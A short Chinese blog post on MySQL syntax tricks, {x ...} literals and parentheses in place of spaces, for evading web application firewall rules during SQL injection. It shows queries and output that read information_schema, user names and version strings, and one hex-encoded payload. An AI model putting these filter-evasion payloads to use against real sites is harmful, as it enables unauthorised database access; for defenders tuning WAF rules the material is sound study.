mysql syntax bypass some WAF
2015-02-12 08:25
316 查看
select{x table_name}from{x information_schema.tables}
mysql> select{x table_name}from{x information_schema.tables}; +----------------------------------------------------+ | table_name | +----------------------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES |
mysql> select{x version()}from{x user}; +---------------+ | {x version()} | +---------------+ | 5.5.20-log | | 5.5.20-log | | 5.5.20-log | | 5.5.20-log | +---------------+ 4 rows in set (0.00 sec)
select{x a}from{x b} . b为当前数据库存在的任意表名。 a就是你要返回的内容。唔 ,我所能想到的场景就是获取user() ,version()之类的 {}代替空格绕过正则的检测啥的。。那我们直接 select{x (user())}或者 select(user())也可以。。
要获取其它信息的话,像这样。
mysql> select{x (select user from user limit 1)} from{x user}; +-------------------------------------+ | {x (select user from user limit 1)} | +-------------------------------------+ | root | | root | | root | | root
mysql> select{x(name)}from{x(manager)}; +--------+ | name | +--------+ | admin | +--------+ 1 row in set (0.00 sec)
可以这样玩,去掉空格
接用圆括号不就好啦!
such as: select(host)from(mysql.user); SELECT(UNHEX(UNHEX(333532453335324533323335)));
直接用括号某些WAF的规则是可以匹配到的
select{x+table_name}from{x(information_schema.tables)}
https://twitter.com/Black2Fan/status/564746640138182656 http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024
相关文章推荐
- WAF Bypass数据库特性(Mysql探索篇)
- notes about crosstool,uboot,mysql and some tools in linux(ubuntu)
- Some More XHTML Syntax Rules:
- SHOW PROFILES Syntax(MySql)
- [Err] 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL s
- Hibernate 与 MySql 数据库关键字冲突You have an error in your SQL syntax; check the manual
- MySQL中 in, some, all等用法的讨论
- ssh开发中插入数据时遇到 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right
- Some issues with php mysql install
- 用 DbUnit 执行 export 导出数据时报 MySQLSyntaxErrorException
- java.sql.SQLException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
- Question 33: How can a C++ developer use the placement new syntax to make new allocate an object of class SomeClass at a particu
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
- [转]Simple Bash Script to install MySQL - Need some help
- java MySQL server version for the right syntax to use near
- com.mysql.jdbc.exceptions.MySQLSyntaxErrorException: Every derived table must have its own alias
- MYSQL - Retrieving some column's name using Row SubQueries 讨论
- "com.mysql.jdbc.exceptions.MySQLSyntaxErrorException: Unknown column"错误解决方法
- check the manual that corresponds to your MySQL server version for the right syntax to use near 'cre
- MySql中any、some、all关键字